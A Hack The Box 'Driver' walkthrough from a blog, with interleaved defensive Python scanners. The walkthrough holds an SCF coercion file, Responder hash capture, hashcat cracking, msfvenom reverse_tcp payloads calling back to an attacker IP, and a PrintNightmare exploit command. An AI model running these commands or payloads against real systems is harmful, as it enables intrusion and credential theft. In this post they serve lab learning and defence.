HTB-Driver

metafa1ica
ip='10.129.254.60'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip

Ports 80, 135, 445 and 5985 are open.

The site prompts for HTTP Basic authentication straight away.

image

admin/admin gets straight in.

image

There is a hint here as well.

image

responder

The HTB hint says to search for "smb share upload file attack".

https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/forced-coercion/url-file-attack

The search turns up this article, which contains an SCF file template. Put that together with the SMB share and the obvious tool is Responder.

[Shell]
Command=2
IconFile=\\10.10.16.42\share\icon.ico
[Taskbar]
Command=ToggleDesktop

responder -I tun0 -v

It immediately captures a pile of authentication attempts.
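From the defender's side, the SCF trick above works because a client parses the file on the share and fetches IconFile from whatever UNC host it names. The following is an added example (not code from the original post or from the article it links): it walks a share directory and reports .scf/.url files whose IconFile points at a host outside an assumed trusted range. The allow-list network, the internal DNS suffix and the sample files are all constructed assumptions.

```python
"""Scan a share for SCF/URL files whose IconFile points at an untrusted UNC host.

Added defensive example; TRUSTED_NETS, the '.driver.htb' suffix and the
files created in demo() are constructed assumptions, not data from the box.
"""
import re
import tempfile
from ipaddress import ip_address, ip_network
from pathlib import Path

# Networks from which icon/SMB fetches are expected (constructed allow-list).
TRUSTED_NETS = [ip_network("10.129.0.0/16")]

# Matches "IconFile=\\host\share\..." in INI-style .scf / .url content.
UNC_RE = re.compile(r"^\s*IconFile\s*=\s*\\\\([^\\\s]+)\\", re.IGNORECASE | re.MULTILINE)

# Constructed copy of the SCF pattern used in the writeup, pointing at an external host.
SAMPLE_SCF = (
    "[Shell]\r\nCommand=2\r\n"
    "IconFile=\\\\10.10.16.42\\share\\icon.ico\r\n"
    "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
)


def unc_hosts(text):
    """Return every host referenced by an IconFile UNC path in the text."""
    return UNC_RE.findall(text)


def is_trusted(host):
    """IP hosts must lie inside TRUSTED_NETS; names must carry the assumed internal suffix."""
    try:
        return any(ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:
        return host.lower().endswith(".driver.htb")  # assumed internal DNS suffix


def scan_share(root):
    """Return (relative_path, host) for each untrusted IconFile reference under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() not in {".scf", ".url"}:
            continue
        for host in unc_hosts(path.read_text(errors="replace")):
            if not is_trusted(host):
                findings.append((path.relative_to(root).as_posix(), host))
    return findings


def demo():
    """Build a throw-away share with one malicious and two benign files, then scan it."""
    with tempfile.TemporaryDirectory() as share:
        (Path(share) / "report.scf").write_text(SAMPLE_SCF)
        (Path(share) / "intranet.url").write_text(
            "[InternetShortcut]\r\nURL=http://intranet\r\n"
            "IconFile=\\\\fs01.driver.htb\\icons\\web.ico\r\n"
        )
        # Wrong extension: Explorer does not parse it, so the scanner ignores it too.
        (Path(share) / "notes.txt").write_text("IconFile=\\\\10.10.16.42\\x\\y")
        return scan_share(share)


if __name__ == "__main__":
    for rel, host in demo():
        print(f"untrusted icon reference in {rel}: \\\\{host}")
```

Running it prints the single constructed hit, report.scf pointing at 10.10.16.42. Scheduled against writable shares, the same check gives early warning that someone is planting coercion files rather than waiting for the NTLMv2 captures to show up in Responder.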

image

[SMB] NTLMv2-SSP Client   : 10.129.254.60
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:f57ce3d84a0014ca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
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Cracking gives the password liltony.

nxc smb $ip -u 'tony' -p 'liltony' --shares

image

nxc winrm $ip -u 'tony' -p 'liltony'
evil-winrm -i $ip -u 'tony' -p 'liltony'

WinRM is clearly available.

image

image

286b2149b0ed831c5264d8304bd2f37c

Privilege escalation

RICOH

The PowerShell history contains something.

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

image

There is a RICOH PCL6 UniversalDriver V4.23.

icacls "c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\*.dll"

The F flag means full access, and the I flag means the permission is inherited from the parent directory. So the inherited write access comes from the parent directory.

image

icacls "c:\ProgramData\RICOH_DRV"

The whole directory grants full control.
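Reading icacls output by eye is error-prone once a directory tree is involved, so here is an added example (my code, not the author's) that parses icacls output and flags ACEs which give a low-privilege principal write-class rights. The icacls listing embedded in it is constructed to mirror the RICOH driver directory described above; the real output from the box is only in the screenshots.

```python
"""Flag icacls ACEs that give low-privilege principals write-class rights.

Added defensive example. SAMPLE is constructed icacls output in the layout
icacls prints (path on the first line, continuation lines indented).
"""
import re

# One ACE per line: optional path, principal, then "(flag)(flag)..." groups.
ACE_RE = re.compile(
    r"^(?P<path>.*?)\s*"
    r"(?P<principal>(?:NT AUTHORITY|NT SERVICE|BUILTIN|APPLICATION PACKAGE AUTHORITY"
    r"|[A-Za-z0-9_.\-]+)\\[^\\:]+"
    r"|CREATOR OWNER|Everyone)"
    r":(?P<flags>(?:\([^)]*\))+)\s*$"
)

# Principals that every interactive or authenticated user effectively holds.
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users",
            "nt authority\\interactive"}
# Simple and specific rights that allow modifying a file or directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

SAMPLE = r"""
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\alpha.dll NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\beta.dll NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 2 files; Failed processing 0 files
"""


def parse_icacls(text):
    """Return (path, principal, [flags]) tuples; continuation lines inherit the path."""
    entries, current = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue  # summary line, blank line, or something that is not an ACE
        if m.group("path").strip():
            current = m.group("path").strip()
        if current is None:
            continue
        flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
        entries.append((current, m.group("principal"), flags))
    return entries


def weak_entries(text):
    """Return (path, principal, [write rights]) for ACEs a standard user can abuse."""
    weak = []
    for path, principal, flags in parse_icacls(text):
        # A flag group may be a single right (F) or a comma list of specific rights (RX,W).
        rights = {r for group in flags for r in group.split(",")}
        granted = rights & WRITE_RIGHTS
        if principal.lower() in LOW_PRIV and granted:
            weak.append((path, principal, sorted(granted)))
    return weak


if __name__ == "__main__":
    for path, principal, rights in weak_entries(SAMPLE):
        print(f"{principal} has {','.join(rights)} on {path}")
```

On the constructed sample only alpha.dll is reported, because BUILTIN\Users holds F on it while beta.dll only grants RX. The (I) marker on the flagged entry is the point the writeup makes: the fix belongs on the parent directory, not on the individual DLLs.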

image

Start msf and search for a related module.

image

But the options call for a session, so first deliver an msf payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.42 LPORT=4444 -f exe >shell.exe

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444

image

Tried several times, none of them worked.

image

I glanced at the code but couldn't tell where it was getting stuck; it seems to be a race-condition bug, and I couldn't be bothered to dig further.

image

PrintNightmare

nxc smb $ip -u tony -p liltony -M spooler

image

Since there is a printer, PrintNightmare has to be checked.

nxc smb $ip -u tony -p liltony -M printnightmare

It reports that the vulnerability is present, and the tool says as much.

image

Generate a DLL with msf and upload it.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.42 LPORT=4444 -f dll >shell.dll

Run the exploit.

python printnightmare.py -dll 'C:\Users\tony\shell.dll' 'tony:liltony@$DRIVER'

Tried twice: the first time it was still tony, the second time it succeeded.
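The driver install the exploit triggers is not silent: the spooler writes Event ID 316 ("Printer driver ... was added or updated") to Microsoft-Windows-PrintService/Operational, and a plug-in module it fails to load produces Event ID 808. The following is an added example, not part of the original post, that triages an exported copy of that log and raises an alert when a driver add references a file outside the spooler driver store or when the same module repeatedly fails to load. The pipe-delimited export layout and the log lines are constructed; the C:\Users\tony\shell.dll path is the one the writeup passes to the exploit.

```python
"""Triage PrintService/Operational events for suspicious driver installs.

Added defensive example. The export layout (timestamp|event id|message)
and every line in SAMPLE_LOG are constructed for the demonstration.
"""
import re
from collections import Counter

# Legitimate print drivers are staged under the spooler driver store.
DRIVER_STORE = "c:\\windows\\system32\\spool\\drivers\\"

# Event 316 lists the driver's files after "Files:-" and ends with "No user action is required."
FILES_RE = re.compile(r"Files:-\s*(.+?)\.\s*No user action", re.IGNORECASE)
# Event 808 names the plug-in module the spooler failed to load.
MODULE_RE = re.compile(r"plug-in module\s+(.+?),", re.IGNORECASE)

SAMPLE_LOG = r"""
2025-08-03 14:05:11|316|Printer driver RICOH PCL6 UniversalDriver V4.23 for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL, C:\Windows\System32\spool\drivers\x64\3\RICOHPDL.DLL. No user action is required.
2025-08-03 14:09:02|316|Printer driver HTB-DRV for Windows x64 Version-3 was added or updated. Files:- C:\Users\tony\shell.dll. No user action is required.
2025-08-03 14:09:02|808|The print spooler failed to load a plug-in module C:\Users\tony\shell.dll, error code 0x45A.
2025-08-03 14:09:03|808|The print spooler failed to load a plug-in module C:\Users\tony\shell.dll, error code 0x45A.
"""


def parse_events(text):
    """Return (timestamp, event_id, message) for each non-blank exported line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, msg = line.split("|", 2)
        events.append((ts, int(eid), msg))
    return events


def driver_files(message):
    """Extract the file list from an Event 316 message (empty if absent)."""
    m = FILES_RE.search(message)
    return [f.strip() for f in m.group(1).split(",")] if m else []


def outside_store(path):
    """True when a driver file does not live under the spooler driver store."""
    return not path.lower().startswith(DRIVER_STORE)


def triage(text):
    """Return alert dicts: driver files outside the store, and repeated 808 failures."""
    alerts, failures = [], Counter()
    for ts, eid, msg in parse_events(text):
        if eid == 316:
            bad = [f for f in driver_files(msg) if outside_store(f)]
            if bad:
                alerts.append({"kind": "driver_outside_store", "time": ts, "files": bad})
        elif eid == 808:
            m = MODULE_RE.search(msg)
            if m:
                failures[m.group(1)] += 1
    for module, count in failures.items():
        alerts.append({"kind": "plugin_load_failed", "module": module, "count": count})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

The first constructed 316 event (real RICOH files under the driver store) produces nothing; the second, pointing at a DLL in a user profile, is flagged, and the two 808 events collapse into one alert with a count. The same rule set is easy to express as a SIEM query once the log is forwarded.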

image

image

image

  • Title: HTB-Driver
  • Author: metafa1ica
  • Created: 2025-08-03 14:03:19
  • Updated: 2025-08-17 13:29:27
  • Link: https://metafa1ica.github.io/post/11acd23e8de2/
  • License: This article is licensed under CC BY-NC-SA 4.0.